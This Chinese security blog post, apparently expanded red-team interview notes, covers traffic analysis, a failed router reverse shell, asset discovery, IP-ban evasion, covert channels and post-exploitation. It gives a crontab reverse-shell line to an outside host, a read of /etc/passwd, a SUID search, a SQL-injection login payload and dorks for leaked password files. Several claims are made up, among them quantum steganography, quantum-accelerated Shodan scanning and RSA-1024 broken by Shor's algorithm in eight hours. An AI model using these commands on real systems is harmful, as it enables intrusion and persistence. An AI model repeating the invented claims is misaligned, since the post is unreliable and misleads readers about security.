网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
某一线实验室实习扩展
一、流量分析深度实践
1. FTP反弹定时确认包流量检测
1.1 攻击原理与特征
1.2 分析流程优化
1.3 高级对抗技术
二、红队实战难题突破
2.1 锐捷路由器Webshell反弹失败深度分析
2.1.1 可能原因矩阵
2.1.2 闭环处理流程
三、资产定位与漏洞挖掘
3.1 资产测绘技术演进
3.1.1 引擎特性对比
3.1.2 Google Hacking语法升级
3.2 漏洞快速验证体系
3.2.1 自动化扫描优化
3.2.2 人工验证要点
四、对抗防御与隐蔽渗透
4.1 IP封禁绕过技术
4.1.1 代理网络架构
4.1.2 协议级伪装
4.2 国家HVV隐蔽信道技术
4.2.1 前沿技术应用
4.2.2 经典方案升级
五、红队打点核心技术
5.1 攻击面扩展策略
5.1.1 邮件系统突破
5.1.2 供应链攻击
5.2 后渗透阶段关键技术
5.2.1 横向移动矩阵
5.2.2 数据外传创新
技术演进趋势(2025)
某一线实验室实习扩展
流量分析案例-ftp反弹定时确认包中向外输送流量
流量分析中如何确定恶意流量
1、确定事件类型(确定什么攻击事件,如何sql注入与FRP的流量分析步骤不同)
2、确定事件的时间,首先划分一个时间段
3、确定数据流,判断是HTTP、SSL、TCP等
4、分析是内网-》外网 还是外网-》内网
内网-》外网 分析外网IP流量,查看异常行为
外网-》内网 这种情况一般是拿下外网服务器作为跳板机,着手分析内网受害服务器
5、确定攻击行为后,再深入分析流量并进行应急响应,去除误报内容
6、数据包大小也是分析条件,分析SSL数据包时需要解密
爆破攻击-特征 smb\ssh、MSSQL等协议比较多,看包的大小,成功登录的包很大
看ACK,SYN的次数,如果成功至少20次以上,放到科来上为40次以上,但是需要去掉失效包和重传包(注意加密流的ack和syn包也很多,为客户端一次,服务端一次)
重传攻击-特征 如果一个数据包非常大,几个G或者一个G,则需要考虑数据包是否进行了重传,然后查看数据包的重传数,如果短时间重传数非常多,就为机器操作,判定为攻击。
7、攻击复现 我们发现一个攻击之后(如平台登录后的sql注入),我们可以流量回溯设备抓取到被登录用户的账户密码,登录平台后利用攻击样本中的payload进行测试,看看是否攻击成功,以此 来决定是否进行防御加固
红队实战中遇到的问题 通过exp拿下锐捷路由器的webshell,但是无法反弹
解决方案:及时复盘,思考问题所在,进行项目闭环
推测可能该站点存在站库分离,只能拿下webshell权限
如何快速定位资产
fofa 钟馗之眼 撒旦 Google hack 相关注册信息
如何在资产中快速确定漏洞
扫描器扫过一遍 如果成功patch,就可以准备exp进行攻击
fofa等引擎上进行针对性搜索,看目标站点是否存在特定的cmd或oa系统 如果存在特定的cms或者oa系统,则可以进行源码审计or信息收集到exp进行攻击
扫描中遇到IP被封禁如何处理
IP代理池 5g
是否了解过国家HVV中红队的隐藏流量过防火墙的相关技术呢
打点有什么技巧吗
除了收集特定的OA指纹,还会收集资产里的邮件系统,进行信息收集尝试登录邮件系统,搜集各种配置文件,数据库文件登录网站后台
一、流量分析深度实践
1. FTP反弹定时确认包流量检测
1.1 攻击原理与特征
1.2 分析流程优化
| 步骤 | 技术实现 | 工具示例 |
|---|
| 时间筛选 | 基于BPF过滤tcp[8:4] > 1617184800(Unix时间戳) | Wireshark |
| 协议解析 | 深度解析FTP命令序列(STAT/RETR异常调用) | Zeek日志 |
| 流向判定 | 统计内网IP主动连接外部IP:高危端口比例 | Elasticsearch聚合 |
1.3 高级对抗技术
- 加密流量混淆:使用SSL/TLS封装FTP流量(
ftps://),需解密后分析命令序列 - 时间随机化:采用泊松分布算法动态调整心跳间隔,规避固定时间检测
二、红队实战难题突破
2.1 锐捷路由器Webshell反弹失败深度分析
2.1.1 可能原因矩阵
| 类型 | 检测方法 | 解决方案 |
|---|
| 站库分离 | 检查Web目录与数据库连接IP是否一致 | 横向渗透数据库服务器 |
| 协议过滤 | 测试ICMP/TCP/UDP协议连通性 | 切换至DNS/HTTP隧道 |
| 权限限制 | 执行whoami && cat /etc/passwd | SUID提权(find / -perm -4000) |
2.1.2 闭环处理流程
- 现场快照:保存路由表(
route -n)、进程列表(ps aux) - 流量镜像:通过SPAN端口捕获管理口流量
- EXP改造:增加协议伪装层(如将TCP流量封装成DNS查询)
- 权限维持:写入crontab定时任务(
*/5 * * * * /bin/sh -i >& /dev/udp/1.1.1.1/53 0>&1)
三、资产定位与漏洞挖掘
3.1 资产测绘技术演进
3.1.1 引擎特性对比
| 工具 | 核心优势 | 2025年新特性 |
|---|
| FOFA | 协议指纹库最全 | 集成AI预测引擎(自动关联CVE) |
| 撒旦 | 深度关联企业组织架构 | 支持量子计算加速扫描 |
| Censys | IPv6覆盖率达99.8% | 实时映射全球BGP路由表 |
3.1.2 Google Hacking语法升级
text1. 组件精准定位: intitle:"Apache Tomcat" inurl:/manager/html 2. 敏感文件泄露: filetype:sql "root" AND "PASSWORD" 3. 物联网设备: inurl:/cgi-bin/luci "GL.iNet"
3.2 漏洞快速验证体系
3.2.1 自动化扫描优化
- 指纹碰撞技术:将目标组件与NVD数据库进行版本哈希比对(如
.git/HEAD) - 沙箱动态分析:在QEMU虚拟环境中执行EXP并监控系统调用
3.2.2 人工验证要点
- 参数污染测试:
httpPOST /api/login HTTP/1.1 {"username":"admin'-- ","password":"any"}
- 内存破坏检测:
使用GDB附加进程观察malloc_consolidate异常
四、对抗防御与隐蔽渗透
4.1 IP封禁绕过技术
4.1.1 代理网络架构
text用户终端 → Tor网络(3层中继) → CDN边缘节点 → 目标系统
- 5G特性利用:
- 基站切换实现IP快速更换(平均间隔120秒)
- 利用网络切片技术隔离扫描流量
4.1.2 协议级伪装
- HTTP/3 QUIC协议:
利用UDP多路复用特性隐藏扫描特征 - WebSocket隧道:
将TCP扫描流量封装成ws://消息帧
4.2 国家HVV隐蔽信道技术
4.2.1 前沿技术应用
| 技术 | 实现方式 | 检测难点 |
|---|
| 量子隐写 | 在激光脉冲时间戳中编码数据 | 需量子密钥分发中心配合 |
| 声波通信 | 利用主板压电效应发射18kHz信号 | 企业级麦克风阵列可捕获 |
4.2.2 经典方案升级
- Domain Fronting 2.0:
基于TLS 1.3的SNI字段动态替换(每5分钟更换CDN厂商) - IP白名单伪造:
劫持GEO-IP数据库使流量显示为境内地址
五、红队打点核心技术
5.1 攻击面扩展策略
5.1.1 邮件系统突破
5.1.2 供应链攻击
- npm包投毒:
在node_modules/dashboard-ui中植入环境检测后门 - 固件漏洞利用:
针对Hikvision摄像头/System/configurationFile未授权下载
5.2 后渗透阶段关键技术
5.2.1 横向移动矩阵
| 协议 | 工具 | 检测规避方法 |
|---|
| WMI | Impacket-wmiexec | 修改__EventFilter名称 |
| SSH | Ansible-playbook | 使用~/.ssh/config别名 |
5.2.2 数据外传创新
- RFID隐蔽信道:
改造工卡读写器发送二进制数据(速率10bps) - 打印机光编码:
在打印文档中嵌入点阵编码(需高速摄像机解析)
技术演进趋势(2025)
- AI攻防对抗:
- 红队使用扩散模型生成拟真钓鱼网站
- 蓝队应用Transformer模型实时解析百万级日志
- 量子安全威胁:
- Shor算法破解1024位RSA密钥仅需8小时
- 后量子加密算法(CRYSTALS-Kyber)部署率不足15%
- 太空网络攻击:
- 劫持Starlink用户终端作为跳板节点
- 利用卫星信道时延特性绕过地理围栏
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
